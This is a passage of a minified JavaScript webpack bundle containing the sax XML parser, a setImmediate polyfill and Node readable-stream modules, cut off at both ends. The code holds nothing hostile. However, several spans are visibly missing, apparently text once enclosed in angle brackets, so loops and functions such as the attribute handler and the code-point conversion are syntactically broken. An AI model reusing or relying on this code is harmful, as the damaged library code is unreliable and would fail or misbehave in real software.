,emsp:8195,thinsp:8201,zwnj:8204,zwj:8205,lrm:8206,rlm:8207,ndash:8211,mdash:8212,lsquo:8216,rsquo:8217,sbquo:8218,ldquo:8220,rdquo:8221,bdquo:8222,dagger:8224,Dagger:8225,bull:8226,hellip:8230,permil:8240,prime:8242,Prime:8243,lsaquo:8249,rsaquo:8250,oline:8254,frasl:8260,euro:8364,image:8465,weierp:8472,real:8476,trade:8482,alefsym:8501,larr:8592,uarr:8593,rarr:8594,darr:8595,harr:8596,crarr:8629,lArr:8656,uArr:8657,rArr:8658,dArr:8659,hArr:8660,forall:8704,part:8706,exist:8707,empty:8709,nabla:8711,isin:8712,notin:8713,ni:8715,prod:8719,sum:8721,minus:8722,lowast:8727,radic:8730,prop:8733,infin:8734,ang:8736,and:8743,or:8744,cap:8745,cup:8746,int:8747,there4:8756,sim:8764,cong:8773,asymp:8776,ne:8800,equiv:8801,le:8804,ge:8805,sub:8834,sup:8835,nsub:8836,sube:8838,supe:8839,oplus:8853,otimes:8855,perp:8869,sdot:8901,lceil:8968,rceil:8969,lfloor:8970,rfloor:8971,lang:9001,rang:9002,loz:9674,spades:9824,clubs:9827,hearts:9829,diams:9830},Object.keys(C.ENTITIES).forEach(function(qe){var De=C.ENTITIES[qe],Ve="number"==typeof De?String.fromCharCode(De):De;C.ENTITIES[qe]=Ve}),C.STATE)C.STATE[C.STATE[M]]=M;function P(qe,De,Ve){qe[De]&&qe[De](Ve)}function G(qe,De,Ve){qe.textNode&&X(qe),P(qe,De,Ve)}function X(qe){qe.textNode=L(qe.opt,qe.textNode),qe.textNode&&P(qe,"ontext",qe.textNode),qe.textNode=""}function L(qe,De){return qe.trim&&(De=De.trim()),qe.normalize&&(De=De.replace(/\s+/g," ")),De}function h(qe,De){return X(qe),qe.trackPosition&&(De+="\nLine: "+qe.line+"\nColumn: "+qe.column+"\nChar: "+qe.c),De=new Error(De),qe.error=De,P(qe,"onerror",De),qe}function R(qe){return qe.sawRoot&&!qe.closedRoot&&J(qe,"Unclosed root tag"),qe.state!==v.BEGIN&&qe.state!==v.BEGIN_WHITESPACE&&qe.state!==v.TEXT&&h(qe,"Unexpected end"),X(qe),qe.c="",qe.closed=!0,P(qe,"onend"),y.call(qe,qe.strict,qe.opt),qe}function J(qe,De){if("object"!=typeof qe||!(qe instanceof y))throw new Error("bad call to strictFail");qe.strict&&h(qe,De)}function Z(qe){qe.strict||(qe.tagName=qe.tagName[qe.looseCase]());var De=qe.tags[qe.tags.length-1]||qe,Ve=qe.tag={name:qe.tagName,attributes:{}};qe.opt.xmlns&&(Ve.ns=De.ns),qe.attribList.length=0,G(qe,"onopentagstart",Ve)}function ue(qe,De){var Ve=qe.indexOf(":")<0?["",qe]:qe.split(":"),ze=Ve[0],me=Ve[1];return De&&"xmlns"===qe&&(ze="xmlns",me=""),{prefix:ze,local:me}}function Ie(qe){if(qe.strict||(qe.attribName=qe.attribName[qe.looseCase]()),-1!==qe.attribList.indexOf(qe.attribName)||qe.tag.attributes.hasOwnProperty(qe.attribName))qe.attribName=qe.attribValue="";else{if(qe.opt.xmlns){var De=ue(qe.attribName,!0),ze=De.local;if("xmlns"===De.prefix)if("xml"===ze&&qe.attribValue!==D)J(qe,"xml: prefix must be bound to "+D+"\nActual: "+qe.attribValue);else if("xmlns"===ze&&qe.attribValue!==w)J(qe,"xmlns: prefix must be bound to "+w+"\nActual: "+qe.attribValue);else{var me=qe.tag,Ke=qe.tags[qe.tags.length-1]||qe;me.ns===Ke.ns&&(me.ns=Object.create(Ke.ns)),me.ns[ze]=qe.attribValue}qe.attribList.push([qe.attribName,qe.attribValue])}else qe.tag.attributes[qe.attribName]=qe.attribValue,G(qe,"onattribute",{name:qe.attribName,value:qe.attribValue});qe.attribName=qe.attribValue=""}}function Ae(qe,De){if(qe.opt.xmlns){var Ve=qe.tag,ze=ue(qe.tagName);Ve.prefix=ze.prefix,Ve.local=ze.local,Ve.uri=Ve.ns[ze.prefix]||"",Ve.prefix&&!Ve.uri&&(J(qe,"Unbound namespace prefix: "+JSON.stringify(qe.tagName)),Ve.uri=ze.prefix),Ve.ns&&(qe.tags[qe.tags.length-1]||qe).ns!==Ve.ns&&Object.keys(Ve.ns).forEach(function(Je){G(qe,"onopennamespace",{prefix:Je,uri:Ve.ns[Je]})});for(var Ke=0,rt=qe.attribList.length;Ke",qe.tagName="",void(qe.state=v.SCRIPT);G(qe,"onscript",qe.script),qe.script=""}var De=qe.tags.length,Ve=qe.tagName;qe.strict||(Ve=Ve[qe.looseCase]());for(var ze=Ve;De--&&qe.tags[De].name!==ze;)J(qe,"Unexpected close tag");if(De<0)return J(qe,"Unmatched closing tag: "+qe.tagName),qe.textNode+="",void(qe.state=v.TEXT);qe.tagName=Ve;for(var me=qe.tags.length;me-- >De;){var Ke=qe.tag=qe.tags.pop();qe.tagName=qe.tag.name,G(qe,"onclosetag",qe.tagName);var rt={};for(var Ge in Ke.ns)rt[Ge]=Ke.ns[Ge];qe.opt.xmlns&&Ke.ns!==(qe.tags[qe.tags.length-1]||qe).ns&&Object.keys(Ke.ns).forEach(function(ht){G(qe,"onclosenamespace",{prefix:ht,uri:Ke.ns[ht]})})}0===De&&(qe.closedRoot=!0),qe.tagName=qe.attribValue=qe.attribName="",qe.attribList.length=0,qe.state=v.TEXT}function Xe(qe){var De,Ve=qe.entity,ze=Ve.toLowerCase(),me="";return qe.ENTITIES[Ve]?qe.ENTITIES[Ve]:qe.ENTITIES[ze]?qe.ENTITIES[ze]:("#"===(Ve=ze).charAt(0)&&("x"===Ve.charAt(1)?(Ve=Ve.slice(2),me=(De=parseInt(Ve,16)).toString(16)):(Ve=Ve.slice(1),me=(De=parseInt(Ve,10)).toString(10))),Ve=Ve.replace(/^0+/,""),isNaN(De)||me.toLowerCase()!==Ve?(J(qe,"Invalid character entity"),"&"+qe.entity+";"):String.fromCodePoint(De))}function He(qe,De){"<"===De?(qe.state=v.OPEN_WAKA,qe.startTagPosition=qe.position):ee(De)||(J(qe,"Non-whitespace before first tag."),qe.textNode=De,qe.state=v.TEXT)}function Be(qe,De){var Ve="";return De1114111||l(Ge)!==Ge)throw RangeError("Invalid code point: "+Ge);Ge<=65535?ze.push(Ge):(qe=55296+((Ge-=65536)>>10),ze.push(qe,Ge%1024+56320)),(me+1===Ke||ze.length>Ve)&&(rt+=z.apply(null,ze),ze.length=0)}return rt},Object.defineProperty?Object.defineProperty(String,"fromCodePoint",{value:f,configurable:!0,writable:!0}):String.fromCodePoint=f)}(U)},4889:function($,U,E){var C=E(4155);!function(b,_){"use strict";if(!b.setImmediate){var y,A,p,D,w,x=1,S={},O=!1,B=b.document,K=Object.getPrototypeOf&&Object.getPrototypeOf(b);K=K&&K.setTimeout?K:b,"[object process]"==={}.toString.call(b.process)?y=function(ve){C.nextTick(function(){se(ve)})}:function(){if(b.postMessage&&!b.importScripts){var ve=!0,le=b.onmessage;return b.onmessage=function(){ve=!1},b.postMessage("","*"),b.onmessage=le,ve}}()?(D="setImmediate$"+Math.random()+"$",w=function(ve){ve.source===b&&"string"==typeof ve.data&&0===ve.data.indexOf(D)&&se(+ve.data.slice(D.length))},b.addEventListener?b.addEventListener("message",w,!1):b.attachEvent("onmessage",w),y=function(ve){b.postMessage(D+ve,"*")}):b.MessageChannel?((p=new MessageChannel).port1.onmessage=function(ve){se(ve.data)},y=function(ve){p.port2.postMessage(ve)}):B&&"onreadystatechange"in B.createElement("script")?(A=B.documentElement,y=function(ve){var le=B.createElement("script");le.onreadystatechange=function(){se(ve),le.onreadystatechange=null,A.removeChild(le),le=null},A.appendChild(le)}):y=function(ve){setTimeout(se,0,ve)},K.setImmediate=function(ve){"function"!=typeof ve&&(ve=new Function(""+ve));for(var le=new Array(arguments.length-1),ye=0;ye{$.exports=b;var C=E(7187).EventEmitter;function b(){C.call(this)}E(5717)(b,C),b.Readable=E(6577),b.Writable=E(323),b.Duplex=E(8656),b.Transform=E(4473),b.PassThrough=E(2366),b.finished=E(1086),b.pipeline=E(6472),b.Stream=b,b.prototype.pipe=function(_,y){var A=this;function p(K){_.writable&&!1===_.write(K)&&A.pause&&A.pause()}function D(){A.readable&&A.resume&&A.resume()}A.on("data",p),_.on("drain",D),_._isStdio||y&&!1===y.end||(A.on("end",x),A.on("close",S));var w=!1;function x(){w||(w=!0,_.end())}function S(){w||(w=!0,"function"==typeof _.destroy&&_.destroy())}function O(K){if(B(),0===C.listenerCount(this,"error"))throw K}function B(){A.removeListener("data",p),_.removeListener("drain",D),A.removeListener("end",x),A.removeListener("close",S),A.removeListener("error",O),_.removeListener("error",O),A.removeListener("end",B),A.removeListener("close",B),_.removeListener("close",B)}return A.on("error",O),_.on("error",O),A.on("end",B),A.on("close",B),_.on("close",B),_.emit("pipe",A),_}},8106:$=>{"use strict";var U={};function E(b,_,y){y||(y=Error);var A=function(p){var D,w;function x(S,O,B){return p.call(this,"string"==typeof _?_:_(S,O,B))||this}return w=p,(D=x).prototype=Object.create(w.prototype),D.prototype.constructor=D,D.__proto__=w,x}(y);A.prototype.name=y.name,A.prototype.code=b,U[b]=A}function C(b,_){if(Array.isArray(b)){var y=b.length;return b=b.map(function(A){return String(A)}),y>2?"one of ".concat(_," ").concat(b.slice(0,y-1).join(", "),", or ")+b[y-1]:2===y?"one of ".concat(_," ").concat(b[0]," or ").concat(b[1]):"of ".concat(_," ").concat(b[0])}return"of ".concat(_," ").concat(String(b))}E("ERR_INVALID_OPT_VALUE",function(b,_){return'The value "'+_+'" is invalid for option "'+b+'"'},TypeError),E("ERR_INVALID_ARG_TYPE",function(b,_,y){var A,D,w,x,O,K;if("string"==typeof _&&"not "===_.substr(0,"not ".length)?(A="must not be",_=_.replace(/^not /,"")):A="must be",O=b,(void 0===K||K>O.length)&&(K=O.length)," argument"===O.substring(K-" argument".length,K))D="The ".concat(b," ").concat(A," ").concat(C(_,"type"));else{var S=("number"!=typeof x&&(x=0),x+1>(w=b).length||-1===w.indexOf(".",x)?"argument":"property");D='The "'.concat(b,'" ').concat(S," ").concat(A," ").concat(C(_,"type"))}return D+". Received type ".concat(typeof y)},TypeError),E("ERR_STREAM_PUSH_AFTER_EOF","stream.push() after EOF"),E("ERR_METHOD_NOT_IMPLEMENTED",function(b){return"The "+b+" method is not implemented"}),E("ERR_STREAM_PREMATURE_CLOSE","Premature close"),E("ERR_STREAM_DESTROYED",function(b){return"Cannot call "+b+" after a stream was destroyed"}),E("ERR_MULTIPLE_CALLBACK","Callback called multiple times"),E("ERR_STREAM_CANNOT_PIPE","Cannot pipe, not readable"),E("ERR_STREAM_WRITE_AFTER_END","write after end"),E("ERR_STREAM_NULL_VALUES","May not write null values to stream",TypeError),E("ERR_UNKNOWN_ENCODING",function(b){return"Unknown encoding: "+b},TypeError),E("ERR_STREAM_UNSHIFT_AFTER_END_EVENT","stream.unshift() after end event"),$.exports.q=U},8656:($,U,E)=>{"use strict";var C=E(4155),b=Object.keys||function(O){var B=[];for(var K in O)B.push(K);return B};$.exports=w;var _=E(6577),y=E(323);E(5717)(w,_);for(var A=b(y.prototype),p=0;p{"use strict";$.exports=b;var C=E(4473);function b(_){if(!(this instanceof b))return new b(_);C.call(this,_)}E(5717)(b,C),b.prototype._transform=function(_,y,A){A(null,_)}},6577:($,U,E)=>{"use strict";var C,b=E(4155);$.exports=M,M.ReadableState=v,E(7187);var _,y=function(De,Ve){return De.listeners(Ve).length},A=E(3194),p=E(8764).Buffer,D=E.g.Uint8Array||function(){},w=E(5575);_=w&&w.debuglog?w.debuglog("stream"):function(){};var x,S,O,B=E(9686),K=E(1029),ee=E(94).getHighWaterMark,se=E(8106).q,ve=se.ERR_INVALID_ARG_TYPE,le=se.ERR_STREAM_PUSH_AFTER_EOF,ye=se.ERR_METHOD_NOT_IMPLEMENTED,z=se.ERR_STREAM_UNSHIFT_AFTER_END_EVENT;E(5717)(M,A);var l=K.errorOrDestroy,f=["error","close","destroy","pause","resume"];function v(De,Ve,ze){C=C||E(8656),"boolean"!=typeof ze&&(ze=Ve instanceof C),this.objectMode=!!(De=De||{}).objectMode,ze&&(this.objectMode=this.objectMode||!!De.readableObjectMode),this.highWaterMark=ee(this,De,"readableHighWaterMark",ze),this.buffer=new B,this.length=0,this.pipes=null,this.pipesCount=0,this.flowing=null,this.ended=!1,this.endEmitted=!1,this.reading=!1,this.sync=!0,this.needReadable=!1,this.emittedReadable=!1,this.readableListening=!1,this.resumeScheduled=!1,this.paused=!0,this.emitClose=!1!==De.emitClose,this.autoDestroy=!!De.autoDestroy,this.destroyed=!1,this.defaultEncoding=De.defaultEncoding||"utf8",this.awaitDrain=0,this.readingMore=!1,this.decoder=null,this.encoding=null,De.encoding&&(x||(x=E(2553).s),this.decoder=new x(De.encoding),this.encoding=De.encoding)}function M(De){if(C=C||E(8656),!(this instanceof M))return new M(De);this._readableState=new v(De,this,this instanceof C),this.readable=!0,De&&("function"==typeof De.read&&(this._read=De.read),"function"==typeof De.destroy&&(this._destroy=De.destroy)),A.call(this)}function P(De,Ve,ze,me,Ke){_("readableAddChunk",Ve);var rt,Qe,ht,mt,lt,Ge=De._readableState;if(null===Ve)Ge.reading=!1,function(Qe,ht){if(_("onEofChunk"),!ht.ended){if(ht.decoder){var mt=ht.decoder.end();mt&&mt.length&&(ht.buffer.push(mt),ht.length+=ht.objectMode?1:mt.length)}ht.ended=!0,ht.sync?h(Qe):(ht.needReadable=!1,ht.emittedReadable||(ht.emittedReadable=!0,R(Qe)))}}(De,Ge);else if(Ke||(Qe=Ge,p.isBuffer(lt=ht=Ve)||lt instanceof D||"string"==typeof ht||void 0===ht||Qe.objectMode||(mt=new ve("chunk",["string","Buffer","Uint8Array"],ht)),rt=mt),rt)l(De,rt);else if(Ge.objectMode||Ve&&Ve.length>0)if("string"==typeof Ve||Ge.objectMode||Object.getPrototypeOf(Ve)===p.prototype||(Ve=function(Qe){return p.from(Qe)}(Ve)),me)Ge.endEmitted?l(De,new z):G(De,Ge,Ve,!0);else if(Ge.ended)l(De,new le);else{if(Ge.destroyed)return!1;Ge.reading=!1,Ge.decoder&&!ze?(Ve=Ge.decoder.write(Ve),Ge.objectMode||0!==Ve.length?G(De,Ge,Ve,!1):J(De,Ge)):G(De,Ge,Ve,!1)}else me||(Ge.reading=!1,J(De,Ge));return!Ge.ended&&(Ge.lengthVe.highWaterMark&&(Ve.highWaterMark=((ze=De)>=X?ze=X:(ze--,ze|=ze>>>1,ze|=ze>>>2,ze|=ze>>>4,ze|=ze>>>8,ze|=ze>>>16,ze++),ze)),De<=Ve.length?De:Ve.ended?Ve.length:(Ve.needReadable=!0,0));var ze}function h(De){var Ve=De._readableState;_("emitReadable",Ve.needReadable,Ve.emittedReadable),Ve.needReadable=!1,Ve.emittedReadable||(_("emitReadable",Ve.flowing),Ve.emittedReadable=!0,b.nextTick(R,De))}function R(De){var Ve=De._readableState;_("emitReadable_",Ve.destroyed,Ve.length,Ve.ended),Ve.destroyed||!Ve.length&&!Ve.ended||(De.emit("readable"),Ve.emittedReadable=!1),Ve.needReadable=!Ve.flowing&&!Ve.ended&&Ve.length<=Ve.highWaterMark,Ue(De)}function J(De,Ve){Ve.readingMore||(Ve.readingMore=!0,b.nextTick(Z,De,Ve))}function Z(De,Ve){for(;!Ve.reading&&!Ve.ended&&(Ve.length0,Ve.resumeScheduled&&!Ve.paused?Ve.flowing=!0:De.listenerCount("data")>0&&De.resume()}function Ie(De){_("readable nexttick read 0"),De.read(0)}function Ae(De,Ve){_("resume",Ve.reading),Ve.reading||De.read(0),Ve.resumeScheduled=!1,De.emit("resume"),Ue(De),Ve.flowing&&!Ve.reading&&De.read(0)}function Ue(De){var Ve=De._readableState;for(_("flow",Ve.flowing);Ve.flowing&&null!==De.read(););}function Xe(De,Ve){return 0===Ve.length?null:(Ve.objectMode?ze=Ve.buffer.shift():!De||De>=Ve.length?(ze=Ve.decoder?Ve.buffer.join(""):1===Ve.buffer.length?Ve.buffer.first():Ve.buffer.concat(Ve.length),Ve.buffer.clear()):ze=Ve.buffer.consume(De,Ve.decoder),ze);var ze}function He(De){var Ve=De._readableState;_("endReadable",Ve.endEmitted),Ve.endEmitted||(Ve.ended=!0,b.nextTick(Be,Ve,De))}function Be(De,Ve){if(_("endReadableNT",De.endEmitted,De.length),!De.endEmitted&&0===De.length&&(De.endEmitted=!0,Ve.readable=!1,Ve.emit("end"),De.autoDestroy)){var ze=Ve._writableState;(!ze||ze.autoDestroy&&ze.finished)&&Ve.destroy()}}function qe(De,Ve){for(var ze=0,me=De.length;ze=Ve.highWaterMark:Ve.length>0)||Ve.ended))return _("read: emitReadable",Ve.length,Ve.ended),0===Ve.length&&Ve.ended?He(this):h(this),null;if(0===(De=L(De,Ve))&&Ve.ended)return 0===Ve.length&&He(this),null;var me,Ke=Ve.needReadable;return _("need readable",Ke),(0===Ve.length||Ve.length-De0?Xe(De,Ve):null)?(Ve.needReadable=Ve.length<=Ve.highWaterMark,De=0):(Ve.length-=De,Ve.awaitDrain=0),0===Ve.length&&(Ve.ended||(Ve.needReadable=!0),ze!==De&&Ve.ended&&He(this)),null!==me&&this.emit("data",me),me},M.prototype._read=function(De){l(this,new ye("_read()"))},M.prototype.pipe=function(De,Ve){var ze=this,me=this._readableState;switch(me.pipesCount){case 0:me.pipes=De;break;case 1:me.pipes=[me.pipes,De];break;default:me.pipes.push(De)}me.pipesCount+=1,_("pipe count=%d opts=%j",me.pipesCount,Ve);var Ke=Ve&&!1===Ve.end||De===b.stdout||De===b.stderr?xe:rt;function rt(){_("onend"),De.end()}me.endEmitted?b.nextTick(Ke):ze.once("end",Ke),De.on("unpipe",function We(Je,Oe){_("onunpipe"),Je===ze&&Oe&&!1===Oe.hasUnpiped&&(Oe.hasUnpiped=!0,_("cleanup"),De.removeListener("close",lt),De.removeListener("finish",ft),De.removeListener("drain",Ge),De.removeListener("error",mt),De.removeListener("unpipe",We),ze.removeListener("end",rt),ze.removeListener("end",xe),ze.removeListener("data",ht),Qe=!0,!me.awaitDrain||De._writableState&&!De._writableState.needDrain||Ge())});var We,Ge=(We=ze,function(){var Je=We._readableState;_("pipeOnDrain",Je.awaitDrain),Je.awaitDrain&&Je.awaitDrain--,0===Je.awaitDrain&&y(We,"data")&&(Je.flowing=!0,Ue(We))});De.on("drain",Ge);var Qe=!1;function ht(We){_("ondata");var Je=De.write(We);_("dest.write",Je),!1===Je&&((1===me.pipesCount&&me.pipes===De||me.pipesCount>1&&-1!==qe(me.pipes,De))&&!Qe&&(_("false write response, pause",me.awaitDrain),me.awaitDrain++),ze.pause())}function mt(We){_("onerror",We),xe(),De.removeListener("error",mt),0===y(De,"error")&&l(De,We)}function lt(){De.removeListener("finish",ft),xe()}function ft(){_("onfinish"),De.removeListener("close",lt),xe()}function xe(){_("unpipe"),ze.unpipe(De)}return ze.on("data",ht),function(We,Je,Oe){if("function"==typeof We.prependListener)return We.prependListener("error",Oe);We._events&&We._events.error?Array.isArray(We._events.error)?We._events.error.unshift(Oe):We._events.error=[Oe,We._events.error]:We.on("error",Oe)}(De,0,mt),De.once("close",lt),De.once("finish",ft),De.emit("pipe",ze),me.flowing||(_("pipe resume"),ze.resume()),De},M.prototype.unpipe=function(De){var Ve=this._readableState,ze={hasUnpiped:!1};if(0===Ve.pipesCount)return this;if(1===Ve.pipesCount)return De&&De!==Ve.pipes||(De||(De=Ve.pipes),Ve.pipes=null,Ve.pipesCount=0,Ve.flowing=!1,De&&De.emit("unpipe",this,ze)),this;if(!De){var me=Ve.pipes,Ke=Ve.pipesCount;Ve.pipes=null,Ve.pipesCount=0,Ve.flowing=!1;for(var rt=0;rt0,!1!==me.flowing&&this.resume()):"readable"===De&&(me.endEmitted||me.readableListening||(me.readableListening=me.needReadable=!0,me.flowing=!1,me.emittedReadable=!1,_("on readable",me.length,me.reading),me.length?h(this):me.reading||b.nextTick(Ie,this))),ze},M.prototype.removeListener=function(De,Ve){var ze=A.prototype.removeListener.call(this,De,Ve);return"readable"===De&&b.nextTick(ue,this),ze},M.prototype.removeAllListeners=function(De){var Ve=A.prototype.removeAllListeners.apply(this,arguments);return"readable"!==De&&void 0!==De||b.nextTick(ue,this),Ve},M.prototype.resume=function(){var ze,De=this._readableState;return De.flowing||(_("resume"),De.flowing=!De.readableListening,this,(ze=De).resumeScheduled||(ze.resumeScheduled=!0,b.nextTick(Ae,this,ze))),De.paused=!1,this},M.prototype.pause=function(){return _("call pause flowing=%j",this._readableState.flowing),!1!==this._readableState.flowing&&(_("pause"),this._readableState.flowing=!1,this.emit("pause")),this._readableState.paused=!0,this},M.prototype.wrap=function(De){var Ve=this,ze=this._readableState,me=!1;for(var Ke in De.on("end",function(){if(_("wrapped end"),ze.decoder&&!ze.ended){var Ge=ze.decoder.end();Ge&&Ge.length&&Ve.push(Ge)}Ve.push(null)}),De.on("data",function(Ge){_("wrapped data"),ze.decoder&&(Ge=ze.decoder.write(Ge)),ze.objectMode&&null==Ge||(ze.objectMode||Ge&&Ge.length)&&(Ve.push(Ge)||(me=!0,De.pause()))}),De)void 0===this[Ke]&&"function"==typeof De[Ke]&&(this[Ke]=function(Ge){return function(){return De[Ge].apply(De,arguments)}}(Ke));for(var rt=0;rt{"use strict";$.exports=w;var C=E(8106).q,b=C.ERR_METHOD_NOT_IMPLEMENTED,_=C.ERR_MULTIPLE_CALLBACK,y=C.ERR_TRANSFORM_ALREADY_TRANSFORMING,A=C.ERR_TRANSFORM_WITH_LENGTH_0,p=E(8656);function D(O,B){var K=this._transformState;K.transforming=!1;var ee=K.writecb;if(null===ee)return this.emit("error",new _);K.writechunk=null,K.writecb=null,null!=B&&this.push(B),ee(O);var se=this._readableState;se.reading=!1,(se.needReadable||se.length{"use strict";var C,b=E(4155);function _(J){var Z=this;this.next=null,this.entry=null,this.finish=function(){!function(ue,Ie,Ae){var Ue=ue.entry;for(ue.entry=null;Ue;){var Xe=Ue.callback;Ie.pendingcb--,Xe(void 0),Ue=Ue.next}Ie.corkedRequestsFree.next=ue}(Z,J)}}$.exports=M,M.WritableState=v;var y,A={deprecate:E(4927)},p=E(3194),D=E(8764).Buffer,w=E.g.Uint8Array||function(){},x=E(1029),S=E(94).getHighWaterMark,O=E(8106).q,B=O.ERR_INVALID_ARG_TYPE,K=O.ERR_METHOD_NOT_IMPLEMENTED,ee=O.ERR_MULTIPLE_CALLBACK,se=O.ERR_STREAM_CANNOT_PIPE,ve=O.ERR_STREAM_DESTROYED,le=O.ERR_STREAM_NULL_VALUES,ye=O.ERR_STREAM_WRITE_AFTER_END,z=O.ERR_UNKNOWN_ENCODING,l=x.errorOrDestroy;function f(){}function v(J,Z,ue){C=C||E(8656),"boolean"!=typeof ue&&(ue=Z instanceof C),this.objectMode=!!(J=J||{}).objectMode,ue&&(this.objectMode=this.objectMode||!!J.writableObjectMode),this.highWaterMark=S(this,J,"writableHighWaterMark",ue),this.finalCalled=!1,this.needDrain=!1,this.ending=!1,this.ended=!1,this.finished=!1,this.destroyed=!1,this.decodeStrings=!(!1===J.decodeStrings),this.defaultEncoding=J.defaultEncoding||"utf8",this.length=0,this.writing=!1,this.corked=0,this.sync=!0,this.bufferProcessing=!1,this.onwrite=function(Ae){!function(Ue,Xe){var Ve,He=Ue._writableState,Be=He.sync,qe=He.writecb;if("function"!=typeof qe)throw new ee;if((Ve=He).writing=!1,Ve.writecb=null,Ve.length-=Ve.writelen,Ve.writelen=0,Xe)!function(Ve,ze,me,Ke,rt){--ze.pendingcb,me?(b.nextTick(rt,Ke),b.nextTick(R,Ve,ze),Ve._writableState.errorEmitted=!0,l(Ve,Ke)):(rt(Ke),Ve._writableState.errorEmitted=!0,l(Ve,Ke),R(Ve,ze))}(Ue,He,Be,Xe,qe);else{var De=L(He)||Ue.destroyed;De||He.corked||He.bufferProcessing||!He.bufferedRequest||X(Ue,He),Be?b.nextTick(G,Ue,He,De,qe):G(Ue,He,De,qe)}}(Z,Ae)},this.writecb=null,this.writelen=0,this.bufferedRequest=null,this.lastBufferedRequest=null,this.pendingcb=0,this.prefinished=!1,this.errorEmitted=!1,this.emitClose=!1!==J.emitClose,this.autoDestroy=!!J.autoDestroy,this.bufferedRequestCount=0,this.corkedRequestsFree=new _(this)}function M(J){var Z=this instanceof(C=C||E(8656));if(!Z&&!y.call(M,this))return new M(J);this._writableState=new v(J,this,Z),this.writable=!0,J&&("function"==typeof J.write&&(this._write=J.write),"function"==typeof J.writev&&(this._writev=J.writev),"function"==typeof J.destroy&&(this._destroy=J.destroy),"function"==typeof J.final&&(this._final=J.final)),p.call(this)}function P(J,Z,ue,Ie,Ae,Ue,Xe){Z.writelen=Ie,Z.writecb=Xe,Z.writing=!0,Z.sync=!0,Z.destroyed?Z.onwrite(new ve("write")):ue?J._writev(Ae,Z.onwrite):J._write(Ae,Ue,Z.onwrite),Z.sync=!1}function G(J,Z,ue,Ie){var Ae,Ue;ue||(Ae=J,0===(Ue=Z).length&&Ue.needDrain&&(Ue.needDrain=!1,Ae.emit("drain"))),Z.pendingcb--,Ie(),R(J,Z)}function X(J,Z){Z.bufferProcessing=!0;var ue=Z.bufferedRequest;if(J._writev&&ue&&ue.next){var Ae=new Array(Z.bufferedRequestCount),Ue=Z.corkedRequestsFree;Ue.entry=ue;for(var Xe=0,He=!0;ue;)Ae[Xe]=ue,ue.isBuf||(He=!1),ue=ue.next,Xe+=1;Ae.allBuffers=He,P(J,Z,!0,Z.length,Ae,"",Ue.finish),Z.pendingcb++,Z.lastBufferedRequest=null,Ue.next?(Z.corkedRequestsFree=Ue.next,Ue.next=null):Z.corkedRequestsFree=new _(Z),Z.bufferedRequestCount=0}else{for(;ue;){var Be=ue.chunk;if(P(J,Z,!1,Z.objectMode?1:Be.length,Be,ue.encoding,ue.callback),ue=ue.next,Z.bufferedRequestCount--,Z.writing)break}null===ue&&(Z.lastBufferedRequest=null)}Z.bufferedRequest=ue,Z.bufferProcessing=!1}function L(J){return J.ending&&0===J.length&&null===J.bufferedRequest&&!J.finished&&!J.writing}function h(J,Z){J._final(function(ue){Z.pendingcb--,ue&&l(J,ue),Z.prefinished=!0,J.emit("prefinish"),R(J,Z)})}function R(J,Z){var Ae,Ue,ue=L(Z);if(ue&&(Ae=J,(Ue=Z).prefinished||Ue.finalCalled||("function"!=typeof Ae._final||Ue.destroyed?(Ue.prefinished=!0,Ae.emit("prefinish")):(Ue.pendingcb++,Ue.finalCalled=!0,b.nextTick(h,Ae,Ue))),0===Z.pendingcb&&(Z.finished=!0,J.emit("finish"),Z.autoDestroy))){var Ie=J._readableState;(!Ie||Ie.autoDestroy&&Ie.endEmitted)&&J.destroy()}return ue}E(5717)(M,p),v.prototype.getBuffer=function(){for(var J=this.bufferedRequest,Z=[];J;)Z.push(J),J=J.next;return Z},function(){try{Object.defineProperty(v.prototype,"buffer",{get:A.deprecate(function(){return this.getBuffer()},"_writableState.buffer is deprecated. Use _writableState.getBuffer instead.","DEP0003")})}catch(J){}}(),"function"==typeof Symbol&&Symbol.hasInstance&&"function"==typeof Function.prototype[Symbol.hasInstance]?(y=Function.prototype[Symbol.hasInstance],Object.defineProperty(M,Symbol.hasInstance,{value:function(J){return!!y.call(this,J)||this===M&&J&&J._writableState instanceof v}})):y=function(J){return J instanceof this},M.prototype.pipe=function(){l(this,new se)},M.prototype.write=function(J,Z,ue){var Ie,He,Be,qe,Ae=this._writableState,Ue=!1,Xe=!Ae.objectMode&&(D.isBuffer(Ie=J)||Ie instanceof w);return Xe&&!D.isBuffer(J)&&(J=D.from(J)),"function"==typeof Z&&(ue=Z,Z=null),Xe?Z="buffer":Z||(Z=Ae.defaultEncoding),"function"!=typeof ue&&(ue=f),Ae.ending?(He=this,Be=ue,qe=new ye,l(He,qe),b.nextTick(Be,qe)):(Xe||function(He,Be,qe,De){var Ve;return null===qe?Ve=new le:"string"==typeof qe||Be.objectMode||(Ve=new B("chunk",["string","Buffer"],qe)),!Ve||(l(He,Ve),b.nextTick(De,Ve),!1)}(this,Ae,J,ue))&&(Ae.pendingcb++,Ue=function(He,Be,qe,De,Ve,ze){if(!qe){var me=(ht=De,(Qe=Be).objectMode||!1===Qe.decodeStrings||"string"!=typeof ht||(ht=D.from(ht,Ve)),ht);De!==me&&(qe=!0,Ve="buffer",De=me)}var Qe,ht,Ke=Be.objectMode?1:De.length;Be.length+=Ke;var rt=Be.length-1))throw new z(J);return this._writableState.defaultEncoding=J,this},Object.defineProperty(M.prototype,"writableBuffer",{enumerable:!1,get:function(){return this._writableState&&this._writableState.getBuffer()}}),Object.defineProperty(M.prototype,"writableHighWaterMark",{enumerable:!1,get:function(){return this._writableState.highWaterMark}}),M.prototype._write=function(J,Z,ue){ue(new K("_write()"))},M.prototype._writev=null,M.prototype.end=function(J,Z,ue){var Ue,Xe,Ie=this._writableState;return"function"==typeof J?(ue=J,J=null,Z=null):"function"==typeof Z&&(ue=Z,Z=null),null!=J&&this.write(J,Z),Ie.corked&&(Ie.corked=1,this.uncork()),Ie.ending||(this,Xe=ue,(Ue=Ie).ending=!0,R(this,Ue),Xe&&(Ue.finished?b.nextTick(Xe):this.once("finish",Xe)),Ue.ended=!0,this.writable=!1),this},Object.defineProperty(M.prototype,"writableLength",{enumerable:!1,get:function(){return this._writableState.length}}),Object.defineProperty(M.prototype,"destroyed",{enumerable:!1,get:function(){return void 0!==this._writableState&&this._writableState.destroyed},set:function(J){this._writableState&&(this._writableState.destroyed=J)}}),M.prototype.destroy=x.destroy,M.prototype._undestroy=x.undestroy,M.prototype._destroy=function(J,Z){Z(J)}},828:($,U,E)=>{"use strict";var C,b=E(4155);function _(le,ye,z){return ye in le?Object.defineProperty(le,ye,{value:z,enumerable:!0,configurable:!0,writable:!0}):le[ye]=z,le}var 